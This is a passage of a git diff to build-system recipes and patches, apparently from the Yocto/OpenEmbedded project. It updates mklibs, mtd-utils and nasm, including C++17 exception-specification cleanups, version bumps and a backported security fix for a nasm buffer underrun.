+@@ -190,7 +190,7 @@ section_data<_class, _data>::section_data(Shdr *shdr, uint8_t *mem) throw ()
+ }
+
+ template <typename _class, typename _data>
+-void section_data<_class, _data>::update(const file &file) throw (std::bad_alloc)
++void section_data<_class, _data>::update(const file &file) throw ()
+ {
+ const section_type<section_type_STRTAB> &section =
+ dynamic_cast<const section_type<section_type_STRTAB> &>(file.get_section(file.get_shstrndx()));
+@@ -204,7 +204,7 @@ section_type<section_type_DYNAMIC>::~section_type() throw ()
+ }
+
+ template <typename _class, typename _data>
+-section_real<_class, _data, section_type_DYNAMIC>::section_real(Shdr *header, uint8_t *mem) throw (std::bad_alloc)
++section_real<_class, _data, section_type_DYNAMIC>::section_real(Shdr *header, uint8_t *mem) throw ()
+ : section_data<_class, _data>(header, mem)
+ {
+ if (this->type != SHT_DYNAMIC)
+@@ -221,7 +221,7 @@ section_real<_class, _data, section_type_DYNAMIC>::section_real(Shdr *header, ui
+ }
+
+ template <typename _class, typename _data>
+-void section_real<_class, _data, section_type_DYNAMIC>::update(const file &file) throw (std::bad_alloc)
++void section_real<_class, _data, section_type_DYNAMIC>::update(const file &file) throw ()
+ {
+ section_data<_class, _data>::update(file);
+
+@@ -243,7 +243,7 @@ section_type<section_type_DYNSYM>::~section_type() throw ()
+ }
+
+ template <typename _class, typename _data>
+-section_real<_class, _data, section_type_DYNSYM>::section_real(Shdr *header, uint8_t *mem) throw (std::bad_alloc)
++section_real<_class, _data, section_type_DYNSYM>::section_real(Shdr *header, uint8_t *mem) throw ()
+ : section_data<_class, _data>(header, mem)
+ {
+ if (this->type != SHT_DYNSYM)
+@@ -260,7 +260,7 @@ section_real<_class, _data, section_type_DYNSYM>::section_real(Shdr *header, uin
+ }
+
+ template <typename _class, typename _data>
+-void section_real<_class, _data, section_type_DYNSYM>::update(const file &file) throw (std::bad_alloc)
++void section_real<_class, _data, section_type_DYNSYM>::update(const file &file) throw ()
+ {
+ section_data<_class, _data>::update (file);
+
+@@ -285,7 +285,7 @@ const version_definition *section_type<section_type_GNU_VERDEF>::get_version_def
+ }
+
+ template <typename _class, typename _data>
+-section_real<_class, _data, section_type_GNU_VERDEF>::section_real(Shdr *header, uint8_t *mem) throw (std::bad_alloc)
++section_real<_class, _data, section_type_GNU_VERDEF>::section_real(Shdr *header, uint8_t *mem) throw ()
+ : section_data<_class, _data>(header, mem)
+ {
+ if (this->type != SHT_GNU_verdef)
+@@ -307,7 +307,7 @@ section_real<_class, _data, section_type_GNU_VERDEF>::section_real(Shdr *header,
+ }
+
+ template <typename _class, typename _data>
+-void section_real<_class, _data, section_type_GNU_VERDEF>::update(const file &file) throw (std::bad_alloc)
++void section_real<_class, _data, section_type_GNU_VERDEF>::update(const file &file) throw ()
+ {
+ section_data<_class, _data>::update(file);
+
+@@ -333,7 +333,7 @@ const version_requirement_entry *section_type<section_type_GNU_VERNEED>::get_ver
+
+ template <typename _class, typename _data>
+ section_real<_class, _data, section_type_GNU_VERNEED>::
+-section_real(Shdr *header, uint8_t *mem) throw (std::bad_alloc)
++section_real(Shdr *header, uint8_t *mem) throw ()
+ : section_data<_class, _data> (header, mem)
+ {
+ if (this->type != SHT_GNU_verneed)
+@@ -355,7 +355,7 @@ section_real(Shdr *header, uint8_t *mem) throw (std::bad_alloc)
+ }
+
+ template <typename _class, typename _data>
+-void section_real<_class, _data, section_type_GNU_VERNEED>::update(const file &file) throw (std::bad_alloc)
++void section_real<_class, _data, section_type_GNU_VERNEED>::update(const file &file) throw ()
+ {
+ section_data<_class, _data>::update(file);
+
+@@ -372,7 +372,7 @@ void section_real<_class, _data, section_type_GNU_VERNEED>::update(const file &f
+
+ template <typename _class, typename _data>
+ section_real<_class, _data, section_type_GNU_VERSYM>::
+-section_real (Shdr *header, uint8_t *mem) throw (std::bad_alloc)
++section_real (Shdr *header, uint8_t *mem) throw ()
+ : section_data<_class, _data> (header, mem)
+ {
+ if (this->type != SHT_GNU_versym)
+@@ -399,7 +399,7 @@ segment_data<_class, _data>::segment_data (Phdr *phdr, uint8_t *mem) throw ()
+ }
+
+ template <typename _class, typename _data>
+-segment_real<_class, _data, segment_type_INTERP>::segment_real (Phdr *header, uint8_t *mem) throw (std::bad_alloc)
++segment_real<_class, _data, segment_type_INTERP>::segment_real (Phdr *header, uint8_t *mem) throw ()
+ : segment_data<_class, _data> (header, mem)
+ {
+ if (this->type != PT_INTERP)
+@@ -429,13 +429,13 @@ dynamic_data<_class, _data>::dynamic_data (Dyn *dyn) throw ()
+ }
+
+ template <typename _class, typename _data>
+-void dynamic_data<_class, _data>::update_string(const section_type<section_type_STRTAB> &section) throw (std::bad_alloc)
++void dynamic_data<_class, _data>::update_string(const section_type<section_type_STRTAB> &section) throw ()
+ {
+ if (is_string)
+ val_string = section.get_string(val);
+ }
+
+-std::string symbol::get_version () const throw (std::bad_alloc)
++std::string symbol::get_version () const throw ()
+ {
+ if (verneed)
+ return verneed->get_name();
+@@ -445,7 +445,7 @@ std::string symbol::get_version () const throw (std::bad_alloc)
+ return "Base";
+ }
+
+-std::string symbol::get_version_file () const throw (std::bad_alloc)
++std::string symbol::get_version_file () const throw ()
+ {
+ if (verneed)
+ return verneed->get_file();
+@@ -453,7 +453,7 @@ std::string symbol::get_version_file () const throw (std::bad_alloc)
+ return "None";
+ }
+
+-std::string symbol::get_name_version () const throw (std::bad_alloc)
++std::string symbol::get_name_version () const throw ()
+ {
+ std::string ver;
+
+@@ -478,13 +478,13 @@ symbol_data<_class, _data>::symbol_data (Sym *sym) throw ()
+ }
+
+ template <typename _class, typename _data>
+-void symbol_data<_class, _data>::update_string(const section_type<section_type_STRTAB> &section) throw (std::bad_alloc)
++void symbol_data<_class, _data>::update_string(const section_type<section_type_STRTAB> &section) throw ()
+ {
+ name_string = section.get_string(name);
+ }
+
+ template <typename _class, typename _data>
+-void symbol_data<_class, _data>::update_version(const file &file, uint16_t index) throw (std::bad_alloc)
++void symbol_data<_class, _data>::update_version(const file &file, uint16_t index) throw ()
+ {
+ if (!file.get_section_GNU_VERSYM())
+ return;
+@@ -531,13 +531,13 @@ version_definition_data<_class, _data>::version_definition_data (Verdef *verdef)
+ }
+
+ template <typename _class, typename _data>
+-void version_definition_data<_class, _data>::update_string(const section_type<section_type_STRTAB> &section) throw (std::bad_alloc)
++void version_definition_data<_class, _data>::update_string(const section_type<section_type_STRTAB> &section) throw ()
+ {
+ for (std::vector<uint32_t>::iterator it = names.begin(); it != names.end(); ++it)
+ names_string.push_back(section.get_string(*it));
+ }
+
+-version_requirement::version_requirement() throw (std::bad_alloc)
++version_requirement::version_requirement() throw ()
+ : file_string("None")
+ { }
+
+@@ -561,7 +561,7 @@ version_requirement_data<_class, _data>::version_requirement_data (Verneed *vern
+
+ template <typename _class, typename _data>
+ void version_requirement_data<_class, _data>::
+-update_string(const section_type<section_type_STRTAB> &section) throw (std::bad_alloc)
++update_string(const section_type<section_type_STRTAB> &section) throw ()
+ {
+ file_string = section.get_string(file);
+
+@@ -596,7 +596,7 @@ version_requirement_entry_data(Vernaux *vna, const version_requirement &verneed)
+
+ template <typename _class, typename _data>
+ void version_requirement_entry_data<_class, _data>::
+-update_string(const section_type<section_type_STRTAB> &section) throw (std::bad_alloc)
++update_string(const section_type<section_type_STRTAB> &section) throw ()
+ {
+ name_string = section.get_string(name);
+ }
+diff --git a/src/mklibs-readelf/elf.hpp b/src/mklibs-readelf/elf.hpp
+index 70e61cd..afb0c9e 100644
+--- a/src/mklibs-readelf/elf.hpp
++++ b/src/mklibs-readelf/elf.hpp
+@@ -49,7 +49,7 @@ namespace Elf
+ const uint16_t get_shstrndx() const throw () { return shstrndx; }
+
+ const std::vector<section *> get_sections() const throw () { return sections; };
+- const section &get_section(unsigned int i) const throw (std::out_of_range) { return *sections.at(i); };
++ const section &get_section(unsigned int i) const throw () { return *sections.at(i); };
+ const section_type<section_type_DYNAMIC> *get_section_DYNAMIC() const throw () { return section_DYNAMIC; };
+ const section_type<section_type_DYNSYM> *get_section_DYNSYM() const throw () { return section_DYNSYM; };
+ const section_type<section_type_GNU_VERDEF> *get_section_GNU_VERDEF() const throw () { return section_GNU_VERDEF; };
+@@ -59,13 +59,13 @@ namespace Elf
+ const std::vector<segment *> get_segments() const throw () { return segments; };
+ const segment_type<segment_type_INTERP> *get_segment_INTERP() const throw () { return segment_INTERP; };
+
+- static file *open(const char *filename) throw (std::bad_alloc, std::runtime_error);
++ static file *open(const char *filename) throw ();
+
+ protected:
+- file(uint8_t *mem, size_t len) throw (std::bad_alloc) : mem(mem), len(len) { }
++ file(uint8_t *mem, size_t len) throw () : mem(mem), len(len) { }
+
+ template<typename _class>
+- static file *open_class(uint8_t *, size_t) throw (std::bad_alloc, std::runtime_error);
++ static file *open_class(uint8_t *, size_t) throw ();
+
+ uint16_t type;
+ uint16_t machine;
+@@ -128,7 +128,7 @@ namespace Elf
+ class section_type<section_type_STRTAB> : public virtual section
+ {
+ public:
+- std::string get_string(uint32_t offset) const throw (std::bad_alloc)
++ std::string get_string(uint32_t offset) const throw ()
+ {
+ return std::string(reinterpret_cast<const char *> (mem + offset));
+ }
+@@ -263,10 +263,10 @@ namespace Elf
+ uint8_t get_bind () const throw () { return bind; }
+ uint8_t get_type () const throw () { return type; }
+ const std::string &get_name_string() const throw () { return name_string; }
+- std::string get_version() const throw (std::bad_alloc);
+- std::string get_version_file() const throw (std::bad_alloc);
++ std::string get_version() const throw ();
++ std::string get_version_file() const throw ();
+ uint16_t get_version_data() const throw () { return versym; }
+- std::string get_name_version() const throw (std::bad_alloc);
++ std::string get_name_version() const throw ();
+
+ protected:
+ uint32_t name;
+@@ -305,7 +305,7 @@ namespace Elf
+ class version_requirement
+ {
+ public:
+- version_requirement() throw (std::bad_alloc);
++ version_requirement() throw ();
+ virtual ~version_requirement () throw () { }
+
+ const std::string &get_file() const throw () { return file_string; }
+diff --git a/src/mklibs-readelf/elf_data.hpp b/src/mklibs-readelf/elf_data.hpp
+index 05effee..3871982 100644
+--- a/src/mklibs-readelf/elf_data.hpp
++++ b/src/mklibs-readelf/elf_data.hpp
+@@ -94,7 +94,7 @@ namespace Elf
+ class file_data : public file
+ {
+ public:
+- file_data(uint8_t *, size_t len) throw (std::bad_alloc, std::runtime_error);
++ file_data(uint8_t *, size_t len) throw ();
+
+ const uint8_t get_class() const throw () { return _class::id; }
+ const uint8_t get_data() const throw () { return _data::id; }
+@@ -109,7 +109,7 @@ namespace Elf
+ public:
+ section_data(Shdr *, uint8_t *) throw ();
+
+- virtual void update(const file &) throw (std::bad_alloc);
++ virtual void update(const file &) throw ();
+ };
+
+ template <typename _class, typename _data, typename _type>
+@@ -133,9 +133,9 @@ namespace Elf
+ typedef typename _elfdef<_class>::Shdr Shdr;
+
+ public:
+- section_real(Shdr *, uint8_t *) throw (std::bad_alloc);
++ section_real(Shdr *, uint8_t *) throw ();
+
+- void update(const file &) throw (std::bad_alloc);
++ void update(const file &) throw ();
+ };
+
+ template <typename _class, typename _data>
+@@ -147,9 +147,9 @@ namespace Elf
+ typedef typename _elfdef<_class>::Shdr Shdr;
+
+ public:
+- section_real(Shdr *, uint8_t *) throw (std::bad_alloc);
++ section_real(Shdr *, uint8_t *) throw ();
+
+- void update(const file &) throw (std::bad_alloc);
++ void update(const file &) throw ();
+ };
+
+ template <typename _class, typename _data>
+@@ -161,9 +161,9 @@ namespace Elf
+ typedef typename _elfdef<_class>::Shdr Shdr;
+
+ public:
+- section_real(Shdr *, uint8_t *) throw (std::bad_alloc);
++ section_real(Shdr *, uint8_t *) throw ();
+
+- void update(const file &) throw (std::bad_alloc);
++ void update(const file &) throw ();
+ };
+
+ template <typename _class, typename _data>
+@@ -175,9 +175,9 @@ namespace Elf
+ typedef typename _elfdef<_class>::Shdr Shdr;
+
+ public:
+- section_real(Shdr *, uint8_t *) throw (std::bad_alloc);
++ section_real(Shdr *, uint8_t *) throw ();
+
+- void update(const file &) throw (std::bad_alloc);
++ void update(const file &) throw ();
+ };
+
+ template <typename _class, typename _data>
+@@ -189,7 +189,7 @@ namespace Elf
+ typedef typename _elfdef<_class>::Shdr Shdr;
+
+ public:
+- section_real(Shdr *, uint8_t *) throw (std::bad_alloc);
++ section_real(Shdr *, uint8_t *) throw ();
+ };
+
+ template <typename _class, typename _data>
+@@ -220,7 +220,7 @@ namespace Elf
+ typedef typename _elfdef<_class>::Phdr Phdr;
+
+ public:
+- segment_real (Phdr *, uint8_t *) throw (std::bad_alloc);
++ segment_real (Phdr *, uint8_t *) throw ();
+ };
+
+ template <typename _class, typename _data>
+@@ -232,7 +232,7 @@ namespace Elf
+ public:
+ dynamic_data (Dyn *) throw ();
+
+- void update_string(const section_type<section_type_STRTAB> &) throw (std::bad_alloc);
++ void update_string(const section_type<section_type_STRTAB> &) throw ();
+ };
+
+ template <typename _class, typename _data>
+@@ -244,8 +244,8 @@ namespace Elf
+ public:
+ symbol_data (Sym *) throw ();
+
+- void update_string(const section_type<section_type_STRTAB> &) throw (std::bad_alloc);
+- virtual void update_version (const file &, uint16_t) throw (std::bad_alloc);
++ void update_string(const section_type<section_type_STRTAB> &) throw ();
++ virtual void update_version (const file &, uint16_t) throw ();
+ };
+
+ template <typename _class, typename _data>
+@@ -257,7 +257,7 @@ namespace Elf
+
+ version_definition_data (Verdef *) throw ();
+
+- void update_string(const section_type<section_type_STRTAB> &) throw (std::bad_alloc);
++ void update_string(const section_type<section_type_STRTAB> &) throw ();
+ };
+
+ template <typename _class, typename _data>
+@@ -269,7 +269,7 @@ namespace Elf
+
+ version_requirement_data (Verneed *) throw ();
+
+- void update_string(const section_type<section_type_STRTAB> &) throw (std::bad_alloc);
++ void update_string(const section_type<section_type_STRTAB> &) throw ();
+ };
+
+ template <typename _class, typename _data>
+@@ -280,7 +280,7 @@ namespace Elf
+
+ version_requirement_entry_data (Vernaux *, const version_requirement &) throw ();
+
+- void update_string(const section_type<section_type_STRTAB> &) throw (std::bad_alloc);
++ void update_string(const section_type<section_type_STRTAB> &) throw ();
+ };
+ }
+
+--
+2.11.0
+
diff --git a/meta/recipes-devtools/mklibs/mklibs-native_0.1.44.bb b/meta/recipes-devtools/mklibs/mklibs-native_0.1.44.bb
index 1784af1f4c..07142e57e0 100644
--- a/meta/recipes-devtools/mklibs/mklibs-native_0.1.44.bb
+++ b/meta/recipes-devtools/mklibs/mklibs-native_0.1.44.bb
@@ -12,6 +12,7 @@ SRC_URI = "http://snapshot.debian.org/archive/debian/20180828T214102Z/pool/main/
file://avoid-failure-on-symbol-provided-by-application.patch \
file://show-GNU-unique-symbols-as-provided-symbols.patch \
file://fix_cross_compile.patch \
+ file://remove-deprecated-exception-specification-cpp17.patch \
"
SRC_URI[md5sum] = "6b6eeb9b4016c6a7317acc28c89e32cc"
diff --git a/meta/recipes-devtools/mmc/mmc-utils_git.bb b/meta/recipes-devtools/mmc/mmc-utils_git.bb
index 5fd1c5c0cd..8fe606915e 100644
--- a/meta/recipes-devtools/mmc/mmc-utils_git.bb
+++ b/meta/recipes-devtools/mmc/mmc-utils_git.bb
@@ -1,5 +1,6 @@
SUMMARY = "Userspace tools for MMC/SD devices"
HOMEPAGE = "http://git.kernel.org/cgit/linux/kernel/git/cjb/mmc-utils.git/"
+DESCRIPTION = "${SUMMARY}"
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://mmc.c;beginline=1;endline=20;md5=fae32792e20f4d27ade1c5a762d16b7d"
diff --git a/meta/recipes-devtools/mtd/mtd-utils/0001-mtd-utils-Fix-return-value-of-ubiformat.patch b/meta/recipes-devtools/mtd/mtd-utils/0001-mtd-utils-Fix-return-value-of-ubiformat.patch
deleted file mode 100644
index d43f7e1a7a..0000000000
--- a/meta/recipes-devtools/mtd/mtd-utils/0001-mtd-utils-Fix-return-value-of-ubiformat.patch
+++ /dev/null
@@ -1,62 +0,0 @@
-From 4d19bffcfd66e25d3ee74536ae2d2da7ad52e8e2 Mon Sep 17 00:00:00 2001
-From: Barry Grussling <barry@grussling.com>
-Date: Sun, 12 Jan 2020 12:33:32 -0800
-Subject: [PATCH] mtd-utils: Fix return value of ubiformat
-Organization: O.S. Systems Software LTDA.
-
-This changeset fixes a feature regression in ubiformat. Older versions of
-ubiformat, when invoked with a flash-image, would return 0 in the case no error
-was encountered. Upon upgrading to latest, it was discovered that ubiformat
-returned 255 even without encountering an error condition.
-
-This changeset corrects the above issue and causes ubiformat, when given an
-image file, to return 0 when no errors are detected.
-
-Tested by running through my loading scripts and verifying ubiformat returned
-0.
-
-Upstream-Status: Backport [2.1.2]
-
-Signed-off-by: Barry Grussling <barry@grussling.com>
-Signed-off-by: David Oberhollenzer <david.oberhollenzer@sigma-star.at>
-Signed-off-by: Otavio Salvador <otavio@ossystems.com.br>
----
- ubi-utils/ubiformat.c | 7 +++++--
- 1 file changed, 5 insertions(+), 2 deletions(-)
-
-diff --git a/ubi-utils/ubiformat.c b/ubi-utils/ubiformat.c
-index a90627c..5377b12 100644
---- a/ubi-utils/ubiformat.c
-+++ b/ubi-utils/ubiformat.c
-@@ -550,6 +550,7 @@ static int format(libmtd_t libmtd, const struct mtd_dev_info *mtd,
- struct ubi_vtbl_record *vtbl;
- int eb1 = -1, eb2 = -1;
- long long ec1 = -1, ec2 = -1;
-+ int ret = -1;
-
- write_size = UBI_EC_HDR_SIZE + mtd->subpage_size - 1;
- write_size /= mtd->subpage_size;
-@@ -643,8 +644,10 @@ static int format(libmtd_t libmtd, const struct mtd_dev_info *mtd,
- if (!args.quiet && !args.verbose)
- printf("\n");
-
-- if (novtbl)
-+ if (novtbl) {
-+ ret = 0;
- goto out_free;
-+ }
-
- if (eb1 == -1 || eb2 == -1) {
- errmsg("no eraseblocks for volume table");
-@@ -669,7 +672,7 @@ static int format(libmtd_t libmtd, const struct mtd_dev_info *mtd,
-
- out_free:
- free(hdr);
-- return -1;
-+ return ret;
- }
-
- int main(int argc, char * const argv[])
---
-2.27.0
-
diff --git a/meta/recipes-devtools/mtd/mtd-utils_git.bb b/meta/recipes-devtools/mtd/mtd-utils_git.bb
index d1658a739b..fa42770ee4 100644
--- a/meta/recipes-devtools/mtd/mtd-utils_git.bb
+++ b/meta/recipes-devtools/mtd/mtd-utils_git.bb
@@ -1,5 +1,6 @@
SUMMARY = "Tools for managing memory technology devices"
HOMEPAGE = "http://www.linux-mtd.infradead.org/"
+DESCRIPTION = "mtd-utils tool is a generic Linux subsystem for memory devices, especially Flash devices."
SECTION = "base"
LICENSE = "GPLv2+"
LIC_FILES_CHKSUM = "file://COPYING;md5=0636e73ff0215e8d672dc4c32c317bb3 \
@@ -10,18 +11,15 @@ inherit autotools pkgconfig update-alternatives
DEPENDS = "zlib e2fsprogs util-linux"
RDEPENDS_mtd-utils-tests += "bash"
-PV = "2.1.1"
+PV = "2.1.3"
-SRCREV = "4443221ce9b88440cd9f5bb78e6fe95621d36c8a"
-SRC_URI = "git://git.infradead.org/mtd-utils.git \
+SRCREV = "42ea7cd48d2b3c306d59bb6c530d79f8c25bf9f5"
+SRC_URI = "git://git.infradead.org/mtd-utils.git;branch=master \
file://add-exclusion-to-mkfs-jffs2-git-2.patch \
- file://0001-mtd-utils-Fix-return-value-of-ubiformat.patch \
-"
+ "
S = "${WORKDIR}/git/"
-EXTRA_OECONF += "--enable-install-tests"
-
# xattr support creates an additional compile-time dependency on acl because
# the sys/acl.h header is needed. libacl is not needed and thus enabling xattr
# regardless whether acl is enabled or disabled in the distro should be okay.
@@ -43,11 +41,9 @@ ALTERNATIVE_PRIORITY = "100"
ALTERNATIVE_${PN} = "flashcp flash_eraseall flash_lock flash_unlock nanddump nandwrite"
ALTERNATIVE_${PN}-ubifs = "ubiattach ubidetach ubimkvol ubirename ubirmvol ubirsvol ubiupdatevol"
-ALTERNATIVE_LINK_NAME[flash_eraseall] = "${sbindir}/flash_eraseall"
ALTERNATIVE_LINK_NAME[nandwrite] = "${sbindir}/nandwrite"
ALTERNATIVE_LINK_NAME[nanddump] = "${sbindir}/nanddump"
ALTERNATIVE_LINK_NAME[ubiattach] = "${sbindir}/ubiattach"
-ALTERNATIVE_LINK_NAME[ubiattach] = "${sbindir}/ubiattach"
ALTERNATIVE_LINK_NAME[ubidetach] = "${sbindir}/ubidetach"
ALTERNATIVE_LINK_NAME[ubimkvol] = "${sbindir}/ubimkvol"
ALTERNATIVE_LINK_NAME[ubirename] = "${sbindir}/ubirename"
diff --git a/meta/recipes-devtools/nasm/nasm/0002-Add-debug-prefix-map-option.patch b/meta/recipes-devtools/nasm/nasm/0002-Add-debug-prefix-map-option.patch
index f788e0fd43..9f4c8dc0bd 100644
--- a/meta/recipes-devtools/nasm/nasm/0002-Add-debug-prefix-map-option.patch
+++ b/meta/recipes-devtools/nasm/nasm/0002-Add-debug-prefix-map-option.patch
@@ -1,4 +1,4 @@
-From bb4e42ad3a0cdd23a1d1797e6299c76b474867c0 Mon Sep 17 00:00:00 2001
+From 81d6519499dcfebe7d21e65e002a8885a4e8d852 Mon Sep 17 00:00:00 2001
From: Joshua Watt <JPEWhacker@gmail.com>
Date: Tue, 19 Nov 2019 13:12:17 -0600
Subject: [PATCH] Add --debug-prefix-map option
@@ -11,7 +11,7 @@ Upstream-Status: Submitted [https://bugzilla.nasm.us/show_bug.cgi?id=3392635]
Signed-off-by: Joshua Watt <JPEWhacker@gmail.com>
---
- asm/nasm.c | 26 +++++++++++++++++++++++++-
+ asm/nasm.c | 24 ++++++++++++++++++++++++
include/nasmlib.h | 9 +++++++++
nasm.txt | 4 ++++
nasmlib/filename.c | 20 ++++++++++++++++++++
@@ -23,34 +23,32 @@ Signed-off-by: Joshua Watt <JPEWhacker@gmail.com>
stdlib/strlcat.c | 2 +-
test/elfdebugprefix.asm | 6 ++++++
test/performtest.pl | 12 ++++++++++--
- 12 files changed, 83 insertions(+), 10 deletions(-)
+ 12 files changed, 82 insertions(+), 9 deletions(-)
create mode 100644 test/elfdebugprefix.asm
diff --git a/asm/nasm.c b/asm/nasm.c
-index a0e1719..fc6c62e 100644
+index e5ae89a..7a7f8b4 100644
--- a/asm/nasm.c
+++ b/asm/nasm.c
-@@ -938,7 +938,8 @@ enum text_options {
- OPT_LIMIT,
+@@ -939,6 +939,7 @@ enum text_options {
OPT_KEEP_ALL,
OPT_NO_LINE,
-- OPT_DEBUG
-+ OPT_DEBUG,
-+ OPT_DEBUG_PREFIX_MAP
+ OPT_DEBUG,
++ OPT_DEBUG_PREFIX_MAP,
+ OPT_REPRODUCIBLE
};
enum need_arg {
- ARG_NO,
-@@ -970,6 +971,7 @@ static const struct textargs textopts[] = {
+@@ -971,6 +972,7 @@ static const struct textargs textopts[] = {
{"keep-all", OPT_KEEP_ALL, ARG_NO, 0},
{"no-line", OPT_NO_LINE, ARG_NO, 0},
{"debug", OPT_DEBUG, ARG_MAYBE, 0},
+ {"debug-prefix-map", OPT_DEBUG_PREFIX_MAP, true, 0},
+ {"reproducible", OPT_REPRODUCIBLE, ARG_NO, 0},
{NULL, OPT_BOGUS, ARG_NO, 0}
};
-
-@@ -1332,6 +1334,26 @@ static bool process_arg(char *p, char *q, int pass)
- case OPT_DEBUG:
- debug_nasm = param ? strtoul(param, NULL, 10) : debug_nasm+1;
+@@ -1337,6 +1339,26 @@ static bool process_arg(char *p, char *q, int pass)
+ case OPT_REPRODUCIBLE:
+ reproducible = true;
break;
+ case OPT_DEBUG_PREFIX_MAP: {
+ struct debug_prefix_list *d;
@@ -75,7 +73,7 @@ index a0e1719..fc6c62e 100644
case OPT_HELP:
help(stdout);
exit(0);
-@@ -2297,6 +2319,8 @@ static void help(FILE *out)
+@@ -2304,6 +2326,8 @@ static void help(FILE *out)
" -w-x disable warning x (also -Wno-x)\n"
" -w[+-]error promote all warnings to errors (also -Werror)\n"
" -w[+-]error=x promote warning x to errors (also -Werror=x)\n"
@@ -85,7 +83,7 @@ index a0e1719..fc6c62e 100644
fprintf(out, " %-20s %s\n",
diff --git a/include/nasmlib.h b/include/nasmlib.h
-index e9bfbcc..98fc653 100644
+index 438178d..4c3e90d 100644
--- a/include/nasmlib.h
+++ b/include/nasmlib.h
@@ -250,10 +250,19 @@ int64_t readstrnum(char *str, int length, bool *warn);
@@ -181,10 +179,10 @@ index 54b22f8..c4a412c 100644
static void as86_cleanup(void)
diff --git a/output/outcoff.c b/output/outcoff.c
-index bcd9ff3..15bfcf3 100644
+index 58fa024..14baf7b 100644
--- a/output/outcoff.c
+++ b/output/outcoff.c
-@@ -1095,14 +1095,14 @@ static void coff_symbol(char *name, int32_t strpos, int32_t value,
+@@ -1072,14 +1072,14 @@ static void coff_symbol(char *name, int32_t strpos, int32_t value,
static void coff_write_symbols(void)
{
@@ -215,7 +213,7 @@ index 61af020..1292958 100644
nsects = sectlen = 0;
syms = saa_init((int32_t)sizeof(struct elf_symbol));
diff --git a/output/outieee.c b/output/outieee.c
-index 4cc0f0f..2468724 100644
+index 6d6d4b2..cdb8333 100644
--- a/output/outieee.c
+++ b/output/outieee.c
@@ -207,7 +207,7 @@ static void ieee_unqualified_name(char *, char *);
@@ -228,10 +226,10 @@ index 4cc0f0f..2468724 100644
fpubhead = NULL;
fpubtail = &fpubhead;
diff --git a/output/outobj.c b/output/outobj.c
-index 0d4d311..d8dd6a0 100644
+index 56b43f9..fefea94 100644
--- a/output/outobj.c
+++ b/output/outobj.c
-@@ -638,7 +638,7 @@ static enum directive_result obj_directive(enum directive, char *);
+@@ -644,7 +644,7 @@ static enum directive_result obj_directive(enum directive, char *);
static void obj_init(void)
{
diff --git a/meta/recipes-devtools/nasm/nasm/CVE-2022-44370.patch b/meta/recipes-devtools/nasm/nasm/CVE-2022-44370.patch
new file mode 100644
index 0000000000..1bd49c9fd9
--- /dev/null
+++ b/meta/recipes-devtools/nasm/nasm/CVE-2022-44370.patch
@@ -0,0 +1,104 @@
+From b37677f7e40276bd8f504584bcba2c092f1146a8 Mon Sep 17 00:00:00 2001
+From: "H. Peter Anvin" <hpa@zytor.com>
+Date: Mon, 7 Nov 2022 10:26:03 -0800
+Subject: [PATCH] quote_for_pmake: fix counter underrun resulting in segfault
+
+while (nbs--) { ... } ends with nbs == -1. Rather than a minimal fix,
+introduce mempset() to make these kinds of errors less likely in the
+future.
+
+Fixes: https://bugzilla.nasm.us/show_bug.cgi?id=3392815
+Reported-by: <13579and24680@gmail.com>
+Signed-off-by: H. Peter Anvin <hpa@zytor.com>
+
+Upstream-Status: Backport
+CVE: CVE-2022-4437
+
+Reference to upstream patch:
+[https://github.com/netwide-assembler/nasm/commit/2d4e6952417ec6f08b6f135d2b5d0e19b7dae30d]
+
+Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com>
+---
+ asm/nasm.c | 12 +++++-------
+ configure.ac | 1 +
+ include/compiler.h | 7 +++++++
+ 3 files changed, 13 insertions(+), 7 deletions(-)
+
+diff --git a/asm/nasm.c b/asm/nasm.c
+index 7a7f8b4..675cff4 100644
+--- a/asm/nasm.c
++++ b/asm/nasm.c
+@@ -1,6 +1,6 @@
+ /* ----------------------------------------------------------------------- *
+ *
+- * Copyright 1996-2020 The NASM Authors - All Rights Reserved
++ * Copyright 1996-2022 The NASM Authors - All Rights Reserved
+ * See the file AUTHORS included with the NASM distribution for
+ * the specific copyright holders.
+ *
+@@ -814,8 +814,7 @@ static char *quote_for_pmake(const char *str)
+ }
+
+ /* Convert N backslashes at the end of filename to 2N backslashes */
+- if (nbs)
+- n += nbs;
++ n += nbs;
+
+ os = q = nasm_malloc(n);
+
+@@ -824,10 +823,10 @@ static char *quote_for_pmake(const char *str)
+ switch (*p) {
+ case ' ':
+ case '\t':
+- while (nbs--)
+- *q++ = '\\';
++ q = mempset(q, '\\', nbs);
+ *q++ = '\\';
+ *q++ = *p;
++ nbs = 0;
+ break;
+ case '$':
+ *q++ = *p;
+@@ -849,9 +848,8 @@ static char *quote_for_pmake(const char *str)
+ break;
+ }
+ }
+- while (nbs--)
+- *q++ = '\\';
+
++ q = mempset(q, '\\', nbs);
+ *q = '\0';
+
+ return os;
+diff --git a/configure.ac b/configure.ac
+index 39680b1..940ebe2 100644
+--- a/configure.ac
++++ b/configure.ac
+@@ -199,6 +199,7 @@ AC_CHECK_FUNCS(strrchrnul)
+ AC_CHECK_FUNCS(iscntrl)
+ AC_CHECK_FUNCS(isascii)
+ AC_CHECK_FUNCS(mempcpy)
++AC_CHECK_FUNCS(mempset)
+
+ AC_CHECK_FUNCS(getuid)
+ AC_CHECK_FUNCS(getgid)
+diff --git a/include/compiler.h b/include/compiler.h
+index db3d6d6..b64da6a 100644
+--- a/include/compiler.h
++++ b/include/compiler.h
+@@ -256,6 +256,13 @@ static inline void *mempcpy(void *dst, const void *src, size_t n)
+ }
+ #endif
+
++#ifndef HAVE_MEMPSET
++static inline void *mempset(void *dst, int c, size_t n)
++{
++ return (char *)memset(dst, c, n) + n;
++}
++#endif
++
+ /*
+ * Hack to support external-linkage inline functions
+ */
+--
+2.40.0
diff --git a/meta/recipes-devtools/nasm/nasm_2.15.03.bb b/meta/recipes-devtools/nasm/nasm_2.15.05.bb
index 5c4e28de06..c5638debdd 100644
--- a/meta/recipes-devtools/nasm/nasm_2.15.03.bb
+++ b/meta/recipes-devtools/nasm/nasm_2.15.05.bb
@@ -1,18 +1,21 @@
SUMMARY = "General-purpose x86 assembler"
SECTION = "devel"
+HOMEPAGE = "http://www.nasm.us/"
+DESCRIPTION = "The Netwide Assembler (NASM) is an assembler and disassembler for the Intel x86 architecture."
LICENSE = "BSD-2-Clause"
LIC_FILES_CHKSUM = "file://LICENSE;md5=90904486f8fbf1861cf42752e1a39efe"
SRC_URI = "http://www.nasm.us/pub/nasm/releasebuilds/${PV}/nasm-${PV}.tar.bz2 \
file://0001-stdlib-Add-strlcat.patch \
